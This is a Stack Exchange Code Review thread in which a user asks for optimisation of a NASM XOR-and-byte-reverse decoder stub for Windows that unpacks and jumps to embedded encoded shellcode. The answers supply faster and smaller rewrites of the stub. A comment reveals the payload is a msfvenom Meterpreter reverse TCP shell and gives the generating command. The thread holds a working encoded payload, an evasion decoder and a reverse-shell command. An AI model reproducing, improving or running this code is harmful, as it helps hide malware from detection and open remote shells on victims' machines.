Optimizing Netwide Assembler codes in Microsoft Windows

Question

I am a novice in assembler programing, I will will appreciate if someone could review these NASM assembler code for me. Is about encoder decoder.
The encoder performs the following:

pads the shellcode with NOP opcodes so it is 4 bytes aligned
a random byte is generated for each 4 bytes of the shellcode
the 4 bytes are put in the reverse order and XORed with the XOR byte
process is repeated until the 0x9090aaaa marker is reached

For those good at NASM assembler for Microsoft Windows, please could you optimize this code? the Code is working but takes lot of time.

global main

section .text

main:
    jmp short call_shellcode

decoder:
    xor eax, eax
    xor ebx, ebx
    xor ecx, ecx
    xor edx, edx
    pop esi             ; address of shellcode
    mov edi, 0xaaaa9090 ; end of shellcode marker
    sub esp, 0x7f       ; make room on the stack (512 bytes)
    sub esp, 0x7f       ; make room on the stack
    sub esp, 0x7f       ; make room on the stack
    sub esp, 0x7f       ; make room on the stack

decode:
    mov bl, byte [esi + edx + 1]    ; read 1st encoded byte
    mov bh, byte [esi + edx + 2]    ; read 2nd encoded byte
    mov cl, byte [esi + edx + 3]    ; read 3rd encoded byte
    mov ch, byte [esi + edx + 4]    ; read 4th encoded byte
    xor bl, byte [esi + edx]        ; xor with the key byte
    xor bh, byte [esi + edx]        ; xor with the key byte
    xor cl, byte [esi + edx]        ; xor with the key byte
    xor ch, byte [esi + edx]        ; xor with the key byte
    mov byte [esp + eax], ch        ; store in memory in reverse order to restore original shellcode
    mov byte [esp + eax + 1], cl    ; ..
    mov byte [esp + eax + 2], bh    ; ..
    mov byte [esp + eax + 3], bl    ; ..

    cmp dword [esi + edx + 5], edi  ; check if we have reached the end of shellcode marked
    jz execute_shellcode            ; if we do, jump to the shellcode and execute it
    
    inc edx
    inc edx
    inc edx
    inc edx
    inc edx
    add eax, 4
    jnz decode

execute_shellcode:
    jmp short esp

call_shellcode:
    call decoder
    encoder_shellcode: db 0x71,0x71,0xfe,0x99,0x8d,0x9a,0x13,0xfa,0x9a,0x9a,0x08,0x6c,0xda,0x39,0xed,0x0d,0x86,0x3d,0x5f,0x86,0x6c,0x3e,0xe7,0x60,0x3e,0x8d,0x82,0x72,0xbc,0x99,0x36,0xbd,0x10,0x7c,0x81,0xb0,0x70,0x81,0x98,0xc2,0x43,0x3f,0x22,0x7f,0xef,0xa4,0x65,0x84,0x88,0xa6,0x19,0xde,0x18,0x14,0xd6,0x2d,0x7f,0xc2,0x58,0x64,0xe3,0x68,0xf3,0xb1,0x68,0x39,0xe9,0x38,0x05,0x7b,0x79,0x2e,0x01,0x39,0xf2,0x18,0x54,0x6c,0xd8,0x9d,0x64,0xef,0x34,0xb4,0x65,0xb0,0xe8,0x3b,0xa8,0xf8,0x5c,0xd9,0x8f,0x5d,0x7c,0x75,0x3c,0x49,0x01,0xbc,0x56,0x62,0xdd,0xa9,0x67,0xc8,0xf9,0x1e,0xc9,0x43,0xfa,0x35,0x3b,0x56,0x3a,0xee,0xd6,0x29,0xef,0xe3,0xa9,0xaa,0x5d,0xdc,0x49,0xcf,0xb2,0xf4,0x37,0xb2,0xea,0xb2,0x0a,0x9f,0xce,0x1a,0x1b,0x3e,0x42,0x91,0x8c,0x80,0x07,0xea,0x5f,0xcf,0xd3,0x97,0x44,0x84,0xfa,0xfe,0x71,0x29,0xfb,0xe1,0x68,0x31,0xe0,0x6a,0xf2,0xa9,0xd6,0xd6,0xb6,0x3a,0x60,0x63,0x5b,0x61,0xd3,0x8b,0x33,0x2c,0x82,0xfb,0xe9,0x70,0xa1,0xa4,0x05,0xfa,0xfa,0x85,0xec,0x41,0x72,0x29,0x1c,0xbe,0xe5,0x8d,0xe5,0xe5,0xd7,0x90,0xcf,0xa2,0xe3,0xe7,0x07,0x70,0x4b,0x6f,0x53,0x4f,0xa7,0xc6,0x48,0x69,0xd7,0x47,0x6f,0x07,0x28,0xde,0xf7,0xde,0xde,0xdf,0x98,0xf0,0xc8,0xcc,0x5c,0xba,0xba,0xd1,0x3a,0x93,0x7c,0x76,0x16,0xa9,0x83,0x36,0x0e,0x9e,0xf6,0x5e,0x1f,0x1f,0x1d,0x77,0x1e,0x14,0xf2,0x9d,0x48,0x05,0xea,0xba,0xba,0xba,0xba,0x87,0xd7,0xc7,0xd7,0xc7,0x05,0xda,0x0a,0xef,0x6d,0xb3,0x24,0x66,0x4c,0x53,0x30,0x67,0x66,0x20,0x5a,0xa9,0xdd,0x0c,0x30,0xc1,0x3a,0xbf,0xef,0xc5,0x5b,0xa2,0x5d,0xa8,0xd6,0x62,0x67,0x8b,0x12,0x6f,0x29,0x9e,0x9e,0x9e,0xf9,0x76,0x60,0x0a,0x60,0x0a,0x60,0xbb,0xd3,0xec,0xed,0xbf,0xc6,0x99,0x0e,0x1f,0xc4,0xa2,0x5a,0x21,0x77,0x5d,0x98,0x13,0xae,0xe6,0x98,0xc0,0xa8,0x80,0xaa,0xf6,0x27,0x27,0x27,0x37,0x27,0xd9,0xb1,0xd9,0xb3,0x8f,0x03,0xe6,0x50,0xa7,0x5b,0x6c,0x3f,0xff,0xb9,0x93,0x4a,0x19,0x1c,0x4a,0x20,0x20,0xf9,0x22,0x48,0x77,0x4e,0x9b,0xb1,0x11,0x86,0xf6,0x8b,0xf6,0x0e,0x75,0xa1,0xa1,0xc9,0xf9,0x89,0xbc,0xd6,0xbc,0xbc,0xfc,0x37,0x3c,0x5f,0x67,0x37,0x20,0xdf,0x10,0x2f,0x0f,0x36,0x43,0x5e,0x61,0xe3,0xc2,0x3d,0xa3,0x8f,0xac,0x11,0xee,0x4f,0x4f,0xc4,0x9a,0x1f,0x95,0xbe,0x96,0x79,0x86,0x86,0x86,0x09,0x28,0xd7,0xd7,0xb3,0xc1,0xf7,0xde,0x34,0xf6,0x08,0x8a,0x49,0x4b,0xff,0x4c,0x4a,0xe8,0xff,0xba,0xf1,0xcc,0x9f,0xcc,0xa6,0x9a,0xf4,0x64,0x64,0x21,0x0b,0x90,0x90,0xaa,0xaa


ret

sorry for the incomplete shellcode. the shellcode should have been in NASM format. Now corrected.

Welcome to code review! Is the decoder working as intended now? — Sᴀᴍ Onᴇᴌᴀ
– Sᴀᴍ Onᴇᴌᴀ ♦, Commented Aug 28, 2022 at 22:13
yes, the decoder is working. i only need to optimize it to be more faster — Ben kubi
– Ben kubi, Commented Aug 28, 2022 at 22:28

user555045 · Accepted Answer · 2022-08-23 03:41:32Z

For what it is, it looks reasonable to me.

There are some things that could be changed if you want.

Some loads could be merged.
```
mov bl, byte [esi + edx + 1]    ; read 1st encoded byte
mov bh, byte [esi + edx + 2]    ; read 2nd encoded byte
```
This pair of loads could be merged into mov bx, word [esi + edx + 1], the second pair of loads could be similarly merged.
5 inc edx instructions could be merged into add edx, 5 in this case. That affects the flags in a different way, notably inc does not affect the carry flag, but that doesn't matter here. This doesn't introduce a nul-byte or something, perhaps you avoided it thinking that it might .. then again there is an add eax, 4 right after it so I don't know what happened.
jnz decode this branch is not really relevant, it should be unconditionally true. However, using jmp here would not be an improvement. In fact that would remove the possibility of macro-fusion between add eax, 4 and the jump/branch. But it allows a different possibility: rewrite the loop so that actual exit (which is now jz execute_shellcode) is at the bottom. Moving the adds is not harmful. In some other cases where moving the "second part of the loop body" would be harmful, it can be moved to above the loop entry (resulting in a loop where the entry point is not at the top) - but in this case it's simpler than that.
```
decode_loop:
    ; do decoding stuff
    add edx, 5  ; the adds are moved here, to before the cmp
    add eax, 4
    cmp dword [esi + edx], edi  ; no +5 because edx has been increased already
    jnz decode_loop
    jmp short esp
```
Writes to partial registers are subject to various performance quirks (and the occasional erratum fixed with a microcode update), probably best avoided if possible/reasonable (reads from partial registers are fine, and writes to 32-bit registers in 64-bit code are fine). An alternative approach using 32-bit registers could be to load the key byte (zero-extended into a 32-bit register), splat it to 4 bytes (eg imul ecx, ecx, 0x01010101), xor the data bytes with the splatted key, use bswap to implement the byte-reverse, then write out the result. No partial registers are harmed in this procedure. This also reduces code size. Example code:
```
movzx ecx, byte [esi + edx]
imul ecx, ecx, 0x01010101
xor ecx, dword [esi + edx + 1]
bswap ecx
mov dword [esp + eax], ecx
```
There are no nul-bytes in this either, though in general they have a higher chance to appear when not going full 8-bit.

thanks, i will appreciate if you could rewrite all in one as a complete code — Ben kubi
– Ben kubi, Commented Aug 23, 2022 at 15:59
@Benkubi I did not discover any specific reason why it would not run — user555045
– user555045, Commented Aug 24, 2022 at 4:27

Sep Roland · Accepted Answer · 2022-08-28 23:42:04Z

sub esp, 0x7f       ; make room on the stack (512 bytes)
sub esp, 0x7f       ; make room on the stack
sub esp, 0x7f       ; make room on the stack
sub esp, 0x7f       ; make room on the stack

Did you notice that 4 times 127 is equal to 508, so not 512 like the original comment is suggesting. Always double check what other people write...

jmp short esp

This makes NASM issue a warning about having to ignore the size tag. If anything this is a near jump, certainly not a short jump. Best write it as jmp esp.

I reworked the code that you downloaded from https://snowscan.io/custom-encoder/# and got it much smaller (should you care).

Then I assembled it with NASM 2.15.05 using

nasm -f win32 theFile.asm

and linked it with the GoDevTools linker

golink /console theFile.obj

It produced a 1KB executable file.

global start

section .text

start:
    jmp  call_shellcode

decoder:
    pop  esi              ; address of shellcode
    mov  ecx, -508
    imul ecx, -1
    sub  esp, ecx
    mov  edi, esp

decode:
    lodsb                 ; read the key byte
    mov  bl, al
    mov  bh, al
    lodsd                 ; read all 4 encoded bytes
    xor  ax, bx           ; xor 1st and 2nd bytes
    bswap eax
    xor  ax, bx           ; xor 3rd and 4th bytes
    stosd                 ; store reversed
    cmp  dword [esi], 0xAAAA9090
    jne  decode

execute_shellcode:
    jmp  esp

call_shellcode:
    call decoder
    encoder_shellcode: db 0xAA, 0xAA, 0x25, 0x42, 0x56, 0xAA, 0x23, 0xCA, 0xAA, 0xAA, 0xAA, ..., 0x90, 0x90, 0xAA, 0xAA

Needless to say that I did not run the shellcode itself since it was only partially included in the question as posted above. So, instead of jumping to the ESP address, I just stopped the program at that point with:

add  esp, ecx      ; restore ESP, ECX=508
xor  eax, eax      ; exitcode
ret

EDIT

Now that you have included the entire (?) encoded shellcode, I could have a look at it once decoded. I don't understand what it is supposed to do, which is probably for the best, but I can see that the code at some point just falls into the great void!

The final decoded part reads:

      ...

      call 0158

      ...

0158  mov  ebx, 56A2B5F0h
015D  push 0
015F  push ebx
0160  call ebp            ; EBP holds the address of the 7th byte of the shellcode
0162  nop                 ; padded by the encoder
0163  nop                 ; padded by the encoder
0164  ???

The execution of garbage will happen at 0164.

your optimization is the same as the original. you can try their shellcode to understand my point — Ben kubi
– Ben kubi, Commented Aug 28, 2022 at 21:41
sorry for the incomplete post. the shellcode is generated from this command "msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444" — Ben kubi
– Ben kubi, Commented Aug 30, 2022 at 12:53

Stack Exchange Network

Optimizing Netwide Assembler codes in Microsoft Windows

2 Answers 2

You must log in to answer this question.

Hot Network Questions

Optimizing Netwide Assembler codes in Microsoft Windows

2 Answers 2

You must log in to answer this question.

Related

Hot Network Questions